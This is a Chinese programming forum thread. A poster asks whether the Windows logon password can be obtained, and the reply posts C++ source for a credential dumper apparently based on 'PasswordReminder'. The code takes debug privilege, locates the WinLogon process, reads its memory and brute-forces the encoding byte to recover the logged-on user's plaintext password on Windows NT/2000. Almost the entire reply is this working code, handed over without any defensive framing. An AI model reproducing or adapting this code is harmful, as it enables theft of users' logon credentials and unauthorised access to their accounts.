密码能得到吗?
解决方案 »
- vc++ 二进制编辑器
- 完成端口的WSARecv
- CopyFile()函数失灵了???
- 不显示删除回复显示所有回复显示星级回复显示得分回复 急急急!!!就这么多分,全给了! VC6.0中为什么给水晶报表设置SQL语句无效??
- 关于QQ传送文件的数据包格式
- 请教大家,如何在ADO中判断一个字段是否可以为空,如果判断一个字段是否为主键?
- SDK编程-类成员变量值无法传递?
- 菜鸟问题,asp调用vc组件的问题~~(急~~~~~~~~~~~)
- 请问如何打开一个文件夹并获得其中文件的相关信息
- MFC双缓存绘图问题
- AfxBeginThread()怎么会出现这种错误?
- 国庆节完毕前最后一次送分!!!![贴了都有分]
{
CString m_csPass;
DWORD i, Hash = 0;
UNICODE_STRING EncodedString;
EncodedString.Length =
(USHORT) PasswordLength * sizeof (wchar_t);
EncodedString.MaximumLength =
((USHORT) PasswordLength * sizeof (wchar_t)) + sizeof (wchar_t);
EncodedString.Buffer =
(PWSTR) HeapAlloc
(GetProcessHeap (),
HEAP_ZERO_MEMORY,
EncodedString.MaximumLength);
// This is a brute force technique since the hash-byte
// is not stored as part of the encoded string - :>(.
for (i = 0; i <= 0xff; i++)
{
CopyMemory
(EncodedString.Buffer,
PasswordP,
PasswordLength * sizeof (wchar_t));
// Finally - try to decode the password.
pfnRtlRunDecodeUnicodeString((BYTE) i, &EncodedString);
// Check for a viewable password.
PBYTE p = (PBYTE) EncodedString.Buffer;
BOOL Viewable = TRUE;
DWORD j, k;
for (j = 0; (j < PasswordLength) && Viewable; j++)
{
if ((*p)
&&
(* (PBYTE)(DWORD (p) + 1) == 0))
{
if (*p < 0x20)
Viewable = FALSE;
if (*p > 0x7e)
Viewable = FALSE;
}
else
Viewable = FALSE;
k = DWORD (p);
k++; k++;
p = (PBYTE) k;
}
if (Viewable)
{
char m_cTemp[255];
WideCharToMultiByte(CP_ACP,0,EncodedString.Buffer,-1,m_cTemp,255,NULL,NULL);
m_csPass=m_cTemp;
TRACE("The hash byte is: 0x%2.2x.\n",i);
break;
}
}
HeapFree(GetProcessHeap(), 0, EncodedString.Buffer);
return m_csPass;
}LocatePasswordPageWin2K(DWORD WinLogonPID, PDWORD PasswordLength)
{
#define USER_DOMAIN_OFFSET_WIN2K 0x400
#define USER_PASSWORD_OFFSET_WIN2K 0x800 HANDLE WinLogonHandle =
OpenProcess
(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
FALSE,
WinLogonPID);
if (WinLogonHandle == 0)
return FALSE;
*PasswordLength = 0;
SYSTEM_INFO SystemInfo;
GetSystemInfo(&SystemInfo);
DWORD i = (DWORD) SystemInfo.lpMinimumApplicationAddress;
DWORD MaxMemory = (DWORD) SystemInfo.lpMaximumApplicationAddress;
DWORD Increment = SystemInfo.dwPageSize;
MEMORY_BASIC_INFORMATION MemoryBasicInformation;
while (i < MaxMemory)
{
if (VirtualQueryEx
(WinLogonHandle,
(PVOID) i,
&MemoryBasicInformation,
sizeof (MEMORY_BASIC_INFORMATION)))
{
Increment = MemoryBasicInformation.RegionSize;
if (((MemoryBasicInformation.State & MEM_COMMIT) == MEM_COMMIT)
&&
((MemoryBasicInformation.Protect & PAGE_GUARD) == 0))
{
PVOID RealStartingAddressP =
HeapAlloc
(GetProcessHeap (),
HEAP_ZERO_MEMORY,
MemoryBasicInformation.RegionSize);
DWORD BytesCopied = 0;
if (ReadProcessMemory
(WinLogonHandle,
(PVOID) i,
RealStartingAddressP,
MemoryBasicInformation.RegionSize,
&BytesCopied))
{
if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0)
&&
(wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0))
{
RealPasswordP = (PVOID) (i + USER_PASSWORD_OFFSET_WIN2K);
PasswordP = (PVOID) ((DWORD) RealStartingAddressP + USER_PASSWORD_OFFSET_WIN2K);
// Calculate the length of encoded unicode string.
PBYTE p = (PBYTE) PasswordP;
DWORD Loc = (DWORD) p;
DWORD Len = 0;
if ((*p == 0) && (* (PBYTE) ((DWORD) p + 1) == 0))
;
else
do
{
Len++;
Loc += 2;
p = (PBYTE) Loc;
} while(*p != 0);
*PasswordLength = Len;
CloseHandle
(WinLogonHandle);
return TRUE;
}
}
HeapFree(GetProcessHeap(), 0, RealStartingAddressP);
}
}
else
Increment = SystemInfo.dwPageSize;
// Move to next memory block.
i += Increment;
}
CloseHandle(WinLogonHandle);
return FALSE;
}
FindWinLogon()
{
#define INITIAL_ALLOCATION 0x100
DWORD rc = 0;
DWORD SizeNeeded = 0;
PVOID InfoP = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION);
// Find how much memory is required.
pfnNtQuerySystemInformation(0x10, InfoP, INITIAL_ALLOCATION, &SizeNeeded);
HeapFree(GetProcessHeap(), 0, InfoP);
// Now, allocate the proper amount of memory.
InfoP = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SizeNeeded);
DWORD SizeWritten = SizeNeeded;
if (pfnNtQuerySystemInformation(0x10, InfoP, SizeNeeded, &SizeWritten))
{
HeapFree(GetProcessHeap(), 0, InfoP);
return (0);
}
DWORD NumHandles = SizeWritten / sizeof (QUERY_SYSTEM_INFORMATION);
if (NumHandles == 0)
{
HeapFree(GetProcessHeap (), 0, InfoP);
return (0);
}
PQUERY_SYSTEM_INFORMATION QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) InfoP;
DWORD i;
for (i = 1; i <= NumHandles; i++)
{
// "5" is the value of a kernel object type process.
if (QuerySystemInformationP->HandleType == 5)
{
PVOID DebugBufferP = pfnRtlCreateQueryDebugBuffer(0, 0);
if (pfnRtlQueryProcessDebugInformation
(QuerySystemInformationP->PID, 1, DebugBufferP) == 0)
{
PPROCESS_INFO_HEADER ProcessInfoHeaderP =
(PPROCESS_INFO_HEADER) ((DWORD) DebugBufferP + 0x60);
DWORD Count = ProcessInfoHeaderP->Count;
PPROCESS_INFO ProcessInfoP =
(PPROCESS_INFO) ((DWORD) ProcessInfoHeaderP + sizeof (PROCESS_INFO_HEADER));
if (strstr (_strupr (ProcessInfoP->Name), "WINLOGON") != 0)
{
DWORD i;
DWORD dw = (DWORD) ProcessInfoP;
for (i = 0; i < Count; i++)
{
dw += sizeof (PROCESS_INFO);
ProcessInfoP = (PPROCESS_INFO) dw;
if (strstr (_strupr (ProcessInfoP->Name), "NWGINA") != 0)
return (0);
if (strstr (_strupr (ProcessInfoP->Name), "MSGINA") == 0)
rc = QuerySystemInformationP->PID;
}
if (DebugBufferP)
pfnRtlDestroyQueryDebugBuffer(DebugBufferP);
HeapFree(GetProcessHeap(), 0, InfoP);
return (rc);
}
}
if (DebugBufferP)
{
pfnRtlDestroyQueryDebugBuffer(DebugBufferP);
}
}
DWORD dw = (DWORD) QuerySystemInformationP;
dw += sizeof (QUERY_SYSTEM_INFORMATION);
QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) dw;
}
HeapFree(GetProcessHeap(), 0, InfoP);
return (rc);
}
代码一堆,自己研究吧,不知道我贴完没有。看看再说。
{
HANDLE Token;
TOKEN_PRIVILEGES TokenPrivileges, PreviousState;
DWORD ReturnLength = 0; if ((!IsWinNT ()) && (!IsWin2K ()))
{
TRACE("Windows NT or Windows 2000 are required.\n");
return false;
} // Add debug privilege to PasswordReminder -
// this is needed for the search for Winlogon.
if (OpenProcessToken(GetCurrentProcess (),TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,&Token))
if (LookupPrivilegeValue(NULL, "SeDebugPrivilege", &TokenPrivileges.Privileges[0].Luid))
{
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges
(Token,
FALSE,
&TokenPrivileges,
sizeof (TOKEN_PRIVILEGES),
&PreviousState,
&ReturnLength))
{
TRACE("Unable to add debug privilege.\n");
return false;
}
}
else
{
TRACE("Unable to add debug privilege.\n");
return false;
}
else
{
TRACE("Unable to add debug privilege.\n");
return false;
} TRACE("The debug privilege has been added to PasswordReminder.\n"); HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL"); pfnNtQuerySystemInformation =
(PFNNTQUERYSYSTEMINFORMATION) GetProcAddress
(hNtDll,
"NtQuerySystemInformation");
pfnRtlCreateQueryDebugBuffer =
(PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress
(hNtDll,
"RtlCreateQueryDebugBuffer");
pfnRtlQueryProcessDebugInformation =
(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress
(hNtDll,
"RtlQueryProcessDebugInformation");
pfnRtlDestroyQueryDebugBuffer =
(PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress
(hNtDll,
"RtlDestroyQueryDebugBuffer");
pfnRtlRunDecodeUnicodeString =
(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress
(hNtDll,
"RtlRunDecodeUnicodeString"); // Locate WinLogon's PID - need debug privilege and admin rights.
DWORD WinLogonPID = FindWinLogon ();
if (WinLogonPID == 0)
{
TRACE("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n");
TRACE("PasswordReminder is unable to find the password in memory.\n");
FreeLibrary (hNtDll);
return false;
}
TRACE("The WinLogon process id is %d (0x%8.8lx).\n", WinLogonPID, WinLogonPID); // Set values to check memory block against.
memset(UserName, 0, sizeof (UserName));
memset(UserDomain, 0, sizeof (UserDomain));
GetEnvironmentVariableW(L"USERNAME", UserName, 0x400);
GetEnvironmentVariableW(L"USERDOMAIN", UserDomain, 0x400); // Locate the block of memory containing
// the password in WinLogon's memory space.
BOOL FoundPasswordPage = FALSE;
if (IsWin2K ())
{
FoundPasswordPage = LocatePasswordPageWin2K(WinLogonPID, &PasswordLength);
}
else
FoundPasswordPage = LocatePasswordPageWinNT(WinLogonPID, &PasswordLength); if (FoundPasswordPage)
{
char m_cTemp[255];
WideCharToMultiByte(CP_ACP,0,UserName,-1,m_cTemp,255,NULL,NULL);
g_csUseaNAME=m_cTemp;
if (PasswordLength == 0)
{
TRACE("The logon information is: %S/%S.\n", UserDomain, UserName);
TRACE("There is no password.\n");
}
else
{
TRACE("The encoded password is found at 0x%8.8lx and has a length of %d.\n",
RealPasswordP,
PasswordLength);
// Decode the password string.
if (IsWin2K ())
g_csPassWord=GetPasswordWin2K ();
else
g_csPassWord=GetPasswordWinNT ();
}
}
else
TRACE("PasswordReminder is unable to find the password in memory.\n");
FreeLibrary (hNtDll);
return true;
}typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;// Undocumented typedef's
typedef struct _QUERY_SYSTEM_INFORMATION
{
DWORD GrantedAccess;
DWORD PID;
WORD HandleType;
WORD HandleId;
DWORD Handle;
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
typedef struct _PROCESS_INFO_HEADER
{
DWORD Count;
DWORD Unk04;
DWORD Unk08;
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO
{
DWORD LoadAddress;
DWORD Size;
DWORD Unk08;
DWORD Enumerator;
DWORD Unk10;
char Name [0x108];
} PROCESS_INFO, *PPROCESS_INFO;
typedef struct _ENCODED_PASSWORD_INFO
{
DWORD HashByte;
DWORD Unk04;
DWORD Unk08;
DWORD Unk0C;
FILETIME LoggedOn;
DWORD Unk18;
DWORD Unk1C;
DWORD Unk20;
DWORD Unk24;
DWORD Unk28;
UNICODE_STRING EncodedPassword;
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;忘了,还有这一些。。这样好像完整了。